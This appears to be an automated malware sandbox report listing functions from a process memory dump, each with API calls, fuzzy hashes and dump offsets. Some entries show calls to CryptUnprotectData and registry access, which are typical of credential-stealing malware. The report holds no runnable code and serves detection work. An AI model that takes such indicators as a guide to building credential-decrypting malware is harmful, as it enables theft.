Opcode ID: 221c82615eed5c33d24d896e6b45b369576c8008d7f8989c84ffb45e6bd8db57
Instruction ID: ac90eb7d5173a1bed2ac3111f5e3485140e5fd4654c1a38f13eae4915c2a16f6
Opcode Fuzzy Hash: 221c82615eed5c33d24d896e6b45b369576c8008d7f8989c84ffb45e6bd8db57
Instruction Fuzzy Hash: 70331E31D10A19CEDB10EF68C944A99F7B1FF99304F15D69AE4587B221EB70AAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6D90, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5670153967.0000000000AC0000.00000040.00000010.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9528a619ac58694c264f5d57caba8f2997746690f254f9c37a27ca0a429367f
Instruction ID: e50cacce57c1f363d9c90cde1dd33b20638c161c24671a39b9427b03e914d108
Opcode Fuzzy Hash: f9528a619ac58694c264f5d57caba8f2997746690f254f9c37a27ca0a429367f
Instruction Fuzzy Hash: 24F16B30A04209DFDB14CFA8C944FADBBF1BF88314F16856DE419AB2A5DB71A945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00A07100, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A07141

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 145a9de2e45262f7576afdea695c99ea101f6e0cc28466cd6a337ce9b9e8fd3e
Instruction ID: 3040d9e98e184547660dfa8eef17ba741fb31581ebb60c18db02542943092c89
Opcode Fuzzy Hash: 145a9de2e45262f7576afdea695c99ea101f6e0cc28466cd6a337ce9b9e8fd3e
Instruction Fuzzy Hash: C2617134E0421DAFDB14DBB4E9597AEB7F2AF84745F108428E805AB390DF74A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E2C130, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00E2C83D

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: ff0abe9573284ad49ea68ca5c6a2dc0e5d4a12bc8dfce66b694b0938ab02fa65
Instruction ID: 7d95ca5da2ca2f17c394152c142878345e8ec5ae71ba61a1e3c24d39dd1bc6bd
Opcode Fuzzy Hash: ff0abe9573284ad49ea68ca5c6a2dc0e5d4a12bc8dfce66b694b0938ab02fa65
Instruction Fuzzy Hash: C41167B28002099FCF10CF99D845BEEBFF4EF88320F208859EA14A7611C375A950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E2C7D3, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00E2C83D

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 32004afc37da241d93a1860a7e6233e48e6b1f51ac707738283a588bd3d326d2
Instruction ID: 2d2f223cc3ee47afe8b4d2a6d74f2050597796073d2f2379f80e81049ebad25c
Opcode Fuzzy Hash: 32004afc37da241d93a1860a7e6233e48e6b1f51ac707738283a588bd3d326d2
Instruction Fuzzy Hash: 941167B68002099FCF10CF99D845BDEBFF4EF48320F208819EA18A7611C375A551CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFB458, Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597aa299e14bc35af606b12e32b893296e42b78adea8a6b9c817d0e817eccfe1
Instruction ID: c57e2d962d7226bd834d4ece8656ec9cefcadfc98d9fb7ea02d248d3e33f37a0
Opcode Fuzzy Hash: 597aa299e14bc35af606b12e32b893296e42b78adea8a6b9c817d0e817eccfe1
Instruction Fuzzy Hash: F742E630B002089FDB149B68C8947BE77A69FC5324F1AC46AE255EF3D5CB75DC418BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E235A0, Relevance: .8, Instructions: 760COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af7bd339630822984f8b1ab6b111551918a2071153932ac98a77d590aba0a07
Instruction ID: c0fd665d14f544ef3588c645dca7a5cab3bde1caceb1c980c56f705c8656dc35
Opcode Fuzzy Hash: 9af7bd339630822984f8b1ab6b111551918a2071153932ac98a77d590aba0a07
Instruction Fuzzy Hash: 5E621B30E047288FCB24EF78C99469DB7B1AF89304F1185A9D54AAB354EF31AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00DF5B91, Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89525545941de6dcf33e19c0723c3ef0d786d160be9bf106ed25946d87c4ae81
Instruction ID: 47fd76c6ff3615f1e6dc78ad8c51e8e217e802df033b4d197a03010aa060ede1
Opcode Fuzzy Hash: 89525545941de6dcf33e19c0723c3ef0d786d160be9bf106ed25946d87c4ae81
Instruction Fuzzy Hash: E542C630A042488FDB24DFB4C4447ADBBB5EF86304F29C569D2199F29ADB74DC45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E29348, Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a10c10fbc030608e4edf136cee770ba1f87949d502c4b3b5027d1d63f14dbab
Instruction ID: 954deb71ad95d83af062e6d7b52ee4f6e909c40f3d618bb19755ea1891625e01
Opcode Fuzzy Hash: 5a10c10fbc030608e4edf136cee770ba1f87949d502c4b3b5027d1d63f14dbab
Instruction Fuzzy Hash: D132C170B002148FDB14DBB8D884AAEB7E6AFC9314F159469D516EB396DB34EC01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4BA48, Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61996c9a04d30028861835c257e6f681d88c2ebd821c9621db178672f4e9eed5
Instruction ID: 1264bf0c2d5e55cfcf4e699759ee2b5eae4c7f76519baf365e0182507667ab64
Opcode Fuzzy Hash: 61996c9a04d30028861835c257e6f681d88c2ebd821c9621db178672f4e9eed5
Instruction Fuzzy Hash: 2012A074A002199FCB14CFA9C894AAEBBF6AFC9314F148569E519DB351EF30DC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF8612, Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a94a8ff7431f4ed770d5684edc04a8a34b5bfc701e068cdd4bee275673ce0270
Instruction ID: 2e67772052cb3c836818064011c30c8b4d2164caf241a005c70e57e40cd8f8ad
Opcode Fuzzy Hash: a94a8ff7431f4ed770d5684edc04a8a34b5bfc701e068cdd4bee275673ce0270
Instruction Fuzzy Hash: CE02DC30A08245CFC7258BAAC4643AE77F2EF8A380F05C89AC545DF277EB705916E752

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C080, Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2679791420fdcebe20500e81546c2b7aaa352a3d5bd3ba92506239e3c131a57f
Instruction ID: ee57f263f49a84bb624e1d762c7646ef16350b9b23f0189856037b6ab45c45a9
Opcode Fuzzy Hash: 2679791420fdcebe20500e81546c2b7aaa352a3d5bd3ba92506239e3c131a57f
Instruction Fuzzy Hash: 1C026E74A01119DFCB54CFA9C998AAEBBB2FFC9320F158169E409AB261D730EC41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00DFEAC0, Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05711e1528464b9ffcabcf24aa94456d63ecb50e2145980a1ff26fb63cd5d5d8
Instruction ID: 8c9872242376854cc2f89abf64e15f28d8ec0e9cba6da383a373422510285898
Opcode Fuzzy Hash: 05711e1528464b9ffcabcf24aa94456d63ecb50e2145980a1ff26fb63cd5d5d8
Instruction Fuzzy Hash: DFF16030A002199FCB04DFB8C884AADB7F2AF84355F2AC555D615EB3A5DB35EC41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E2EAB8, Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470e6db2a1c4d6a1179de5dfdeb97c721e2938c85bba91821d1d963f953846bc
Instruction ID: b923c8dd87e2c77068a6731dd41dcaeac7e46caa16ccfa1d9e8c2509146c1954
Opcode Fuzzy Hash: 470e6db2a1c4d6a1179de5dfdeb97c721e2938c85bba91821d1d963f953846bc
Instruction Fuzzy Hash: 30D1D630B042149FDB14EBB4C955BAE7AE7AFC5344F15882CE516AB394DF35AC02CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A05960, Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7502fc2ab436ae7a8b5ae7ad8e20c2cc0cb3d0da595ed112d8c129543937c26
Instruction ID: 1dd467f69916bdb17f821893f56e8d2e42550e3054e5c431715acff983b51941
Opcode Fuzzy Hash: d7502fc2ab436ae7a8b5ae7ad8e20c2cc0cb3d0da595ed112d8c129543937c26
Instruction Fuzzy Hash: BAC1C034B043089FEB04DBB4D898BAE7BA2AFC5344F158469E505DF395EB34EC428B61

Uniqueness

Uniqueness Score: -1.00%

Function 1DA35E08, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0310522dcf56de53cb4da6d57bdc2424177e652870d1c443ba6914be4a41f73
Instruction ID: 12d2bbbd63ccb355f0213f13711f273ef3a0077c326c9c9f14abea414415be76
Opcode Fuzzy Hash: c0310522dcf56de53cb4da6d57bdc2424177e652870d1c443ba6914be4a41f73
Instruction Fuzzy Hash: AD1290F14017668BEB10DF66C9C839A7BB1F7853A8B524318D2632B2D1D7B9218BDF44

Uniqueness

Uniqueness Score: -1.00%

Function 00A43A50, Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed3043fa0b3d3880d8decc764ec017d8fe5611e9d6b43f358d36d0abf897060
Instruction ID: ad23f55472b82d5776ec0f14c75b0b0fc92f6b5d9043caf3dd7d8d7c455497bf
Opcode Fuzzy Hash: 6ed3043fa0b3d3880d8decc764ec017d8fe5611e9d6b43f358d36d0abf897060
Instruction Fuzzy Hash: 95B17D75E00209DFDF14CFA9C8857EEBBF2AF88704F148529D815EB294EB749946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A44320, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2f386337daf69bfcfde88415aea0f6602f8099f43a2217c0fd675c32d3c799
Instruction ID: 8d36f573dc3e805b8d044315d3de776cf13b483ee2f40ca309abb8653ca1d6a9
Opcode Fuzzy Hash: 8b2f386337daf69bfcfde88415aea0f6602f8099f43a2217c0fd675c32d3c799
Instruction Fuzzy Hash: F3B16B74E0420D8FDF10CFA9D8817ADBBF2AF88718F248529D815EB294EB749845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1DA346C4, Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6ef7c975a93f67fb9c204658085639601c4e40c7d85736eb466e84494dcfea2
Instruction ID: 634de5990f9d657e4c8e33951391fd4ef28be5cba21d5cb23d5a4592665cfce1
Opcode Fuzzy Hash: f6ef7c975a93f67fb9c204658085639601c4e40c7d85736eb466e84494dcfea2
Instruction Fuzzy Hash: DDA1A275E0031D9FCB04DFA4C8949EDB7BAFF89310F1A8615E516AB3A4EB30A941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DA35DC3, Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83b672be34997e37276c13b8116b18d6ca97ce94b701a6d18b8e8b61ea107c0a
Instruction ID: db372c66d4b21c98d7450e109bc452cbf53c0bc273353212312f544d23c2856b
Opcode Fuzzy Hash: 83b672be34997e37276c13b8116b18d6ca97ce94b701a6d18b8e8b61ea107c0a
Instruction Fuzzy Hash: 33D149B08017698FDB01DF66C9C839A7BB1FB85398B124319D2636B2D1D7B8258BCF54

Uniqueness

Uniqueness Score: -1.00%

Function 1DA36AF1, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f3fdede5454f38a0e4159e4dbb0a3f667d684cf54f7b7f90cb96570e1640cf
Instruction ID: c8249790324eab7dbc4d67197956c567e86d156875eb301dac6a652e51dde871
Opcode Fuzzy Hash: 28f3fdede5454f38a0e4159e4dbb0a3f667d684cf54f7b7f90cb96570e1640cf
Instruction Fuzzy Hash: 38918479E0031D9FCB04DFA0C8949EDF7BAFF89310F168615E516AB2A4EB30A945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1DA3A2CF, Relevance: 6.2, APIs: 4, Instructions: 153threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 1DA3A386
GetCurrentThread.KERNEL32 ref: 1DA3A3C3
GetCurrentProcess.KERNEL32 ref: 1DA3A400
GetCurrentThreadId.KERNEL32 ref: 1DA3A459

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d583b0e7656b9255c8968f3de20490f5db269b0db9443d819261fb142b7270d5
Instruction ID: 143eda16397e7315f4e62778b238726b5441c43ec47bf92d1d247d5047e5b879
Opcode Fuzzy Hash: d583b0e7656b9255c8968f3de20490f5db269b0db9443d819261fb142b7270d5
Instruction Fuzzy Hash: 9161BAB0D007498FDB01CFA9D458BEEBFF5AF89314F24889AD009A7392D7359944CB26

Uniqueness

Uniqueness Score: -1.00%

Function 1DA3A308, Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 1DA3A386
GetCurrentThread.KERNEL32 ref: 1DA3A3C3
GetCurrentProcess.KERNEL32 ref: 1DA3A400
GetCurrentThreadId.KERNEL32 ref: 1DA3A459

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 993e4f95ba5fbad4ccddf2db4dd40d6f4ff2c1588cc6c822760ee7ec9c7eb9af
Instruction ID: 04d128df77036955f94cfbdd327501551b5f22d5932d80dd7434ed5794b539ec
Opcode Fuzzy Hash: 993e4f95ba5fbad4ccddf2db4dd40d6f4ff2c1588cc6c822760ee7ec9c7eb9af
Instruction Fuzzy Hash: CE5198B4D006099FDB04CFA9C558BEEBFF5AF88314F208859E40AA7351D776A940CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00A00B34, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 00A012E4

Strings

l), xrefs: 00A00B34
t*, xrefs: 00A01288

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID: Open
String ID: l)$t*
API String ID: 71445658-36281846
Opcode ID: 5636d34e12b145be31f921c1aedccd7c833df78bcb53be3002308f496527cc26
Instruction ID: 810e5011c583a11cd2dac2069893f1f59236a60a69299836ff18bd49b7a3e565
Opcode Fuzzy Hash: 5636d34e12b145be31f921c1aedccd7c833df78bcb53be3002308f496527cc26
Instruction Fuzzy Hash: 5131FFB0D012499FDB10CF99C584ACEFFF5AF49304F24856AE809AB381C7759985CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A46950, Relevance: 2.5, APIs: 1, Instructions: 963libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eedd759fe41749af9db8360d502ef7449466443f78b8e7bf0b76f9a36c988f47
Instruction ID: 055956f91a300953f7e0b7e8bc269d52f29364810238a7704b66ae3428380878
Opcode Fuzzy Hash: eedd759fe41749af9db8360d502ef7449466443f78b8e7bf0b76f9a36c988f47
Instruction Fuzzy Hash: B6A2EA74A09229CFCB65DF74C9887ADB7B6BF88305F2045EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46971, Relevance: 2.1, APIs: 1, Instructions: 635libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 515d708bdc68c7ba7858c4ff21586b64f837942f0b19ebc7b6a945dc02ba244d
Instruction ID: 8227b0c134929f3c2b2194042696e1051d32150ebe26068c072c8ba6cd0b9260
Opcode Fuzzy Hash: 515d708bdc68c7ba7858c4ff21586b64f837942f0b19ebc7b6a945dc02ba244d
Instruction Fuzzy Hash: D862EA78909229CFCB65DF70C98869DB7B6BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A469AF, Relevance: 2.1, APIs: 1, Instructions: 630libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d37a192b562331223657f22f193453b028cca63b5ece13b585d05fe8cf0006c
Instruction ID: 8e9b387e1623cdd8fe63d8f3c3bcc486fe80f988df17dc65018d84818d6152bb
Opcode Fuzzy Hash: 4d37a192b562331223657f22f193453b028cca63b5ece13b585d05fe8cf0006c
Instruction Fuzzy Hash: F262EA78909229CFCB65DF70C9886ADB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A469F6, Relevance: 2.1, APIs: 1, Instructions: 623libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92f3919418a306d6ce167fdeb2b4b1d8b273f0b0cef0eff4162323ccf18a1393
Instruction ID: 85afc8a39934f859bb01e191261fb99c17eb09ece013a6e057bbf20592bca183
Opcode Fuzzy Hash: 92f3919418a306d6ce167fdeb2b4b1d8b273f0b0cef0eff4162323ccf18a1393
Instruction Fuzzy Hash: 6752FB78909229CFCB65DF70C9886ADB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46A3D, Relevance: 2.1, APIs: 1, Instructions: 616libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: edfb5aea6a167b253e129a10a9011db7da4ff2b31f688a04ddba1fab8cef873a
Instruction ID: b71acc68ef362e18f2505d2fed6d3869c93e7a90a5a237a4c8d7c5bfbb21b639
Opcode Fuzzy Hash: edfb5aea6a167b253e129a10a9011db7da4ff2b31f688a04ddba1fab8cef873a
Instruction Fuzzy Hash: A752EB78909229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46A84, Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d92eac2b5d32a4e0e05545576a5abdbc1b44d69b29fcfa90390ceb718b90edbf
Instruction ID: cd8523214891d3a0b2724e81fecf40c81750509da2031c6254b4407e55432711
Opcode Fuzzy Hash: d92eac2b5d32a4e0e05545576a5abdbc1b44d69b29fcfa90390ceb718b90edbf
Instruction Fuzzy Hash: 7252EB78A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46ACB, Relevance: 2.1, APIs: 1, Instructions: 602libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a66a50f62223d123f9d20ceb2050385493fd8453398ec3abd69262841b206d8
Instruction ID: e70bad27247b667b1cb5bd6e796f10a6d3e118ff5444c3b132f0ac49dcca3d18
Opcode Fuzzy Hash: 8a66a50f62223d123f9d20ceb2050385493fd8453398ec3abd69262841b206d8
Instruction Fuzzy Hash: BC52FB78A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B12, Relevance: 2.1, APIs: 1, Instructions: 593libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7c16005e7df95e09534b2b4551b3bd1dcaf7283ca0d5dfe0f57045a529fefce
Instruction ID: cd81af4c5fe55a45677882cd324b672d561e1a67e80ba23db7b773a3e82da323
Opcode Fuzzy Hash: d7c16005e7df95e09534b2b4551b3bd1dcaf7283ca0d5dfe0f57045a529fefce
Instruction Fuzzy Hash: 2A52FA78A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B50, Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 843a89829354e0dd6aa9fded6f0939978dc27aa14fd4730ed955661aac4e0333
Instruction ID: 0d1658feafd9e2ca772c1d9ef2a85607925ee3c3c3d5d67498fe8beaf16d5888
Opcode Fuzzy Hash: 843a89829354e0dd6aa9fded6f0939978dc27aa14fd4730ed955661aac4e0333
Instruction Fuzzy Hash: 7252FA78A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46B97, Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f20b656445981393cb6fc8d431b7477b6a4e0f9a141096d884e001e58bbe280
Instruction ID: a7bcac80cf4be03609d536f0045649752c6845a7e2851fc63db8b6b179d27a2c
Opcode Fuzzy Hash: 9f20b656445981393cb6fc8d431b7477b6a4e0f9a141096d884e001e58bbe280
Instruction Fuzzy Hash: 5D52FA78A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46BDE, Relevance: 2.1, APIs: 1, Instructions: 574libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 632392da8c2d5fe9efa0268f8237dd3a9ffccaf6421e284789dc959291758831
Instruction ID: bce9fdd5513c3aebd139ffca076cd20ad0366066a0e034247046246898b782f5
Opcode Fuzzy Hash: 632392da8c2d5fe9efa0268f8237dd3a9ffccaf6421e284789dc959291758831
Instruction Fuzzy Hash: CC42FA78A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46C25, Relevance: 2.1, APIs: 1, Instructions: 567libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12af501a333c609f131dfccbdda1c2cec65ba7b1d366084e29625ece574c3fa6
Instruction ID: 4d7cec92c69132f4978520965d3e23d5e65225498c3c5471986b2e63bcc06fdf
Opcode Fuzzy Hash: 12af501a333c609f131dfccbdda1c2cec65ba7b1d366084e29625ece574c3fa6
Instruction Fuzzy Hash: C142F978A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46C6C, Relevance: 2.1, APIs: 1, Instructions: 560libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8513d250bf6b8469809d3042af2fcde6151244955565e7a8e37e405623294c93
Instruction ID: 6f74e034579f1466777118fa836991a71d348da2a819dbee13fba5b0f911faf3
Opcode Fuzzy Hash: 8513d250bf6b8469809d3042af2fcde6151244955565e7a8e37e405623294c93
Instruction Fuzzy Hash: 9242E978A09229CFCB65DF70C98869DB7B5BF88305F2485EAD50AA3344DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46CB3, Relevance: 2.1, APIs: 1, Instructions: 553libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
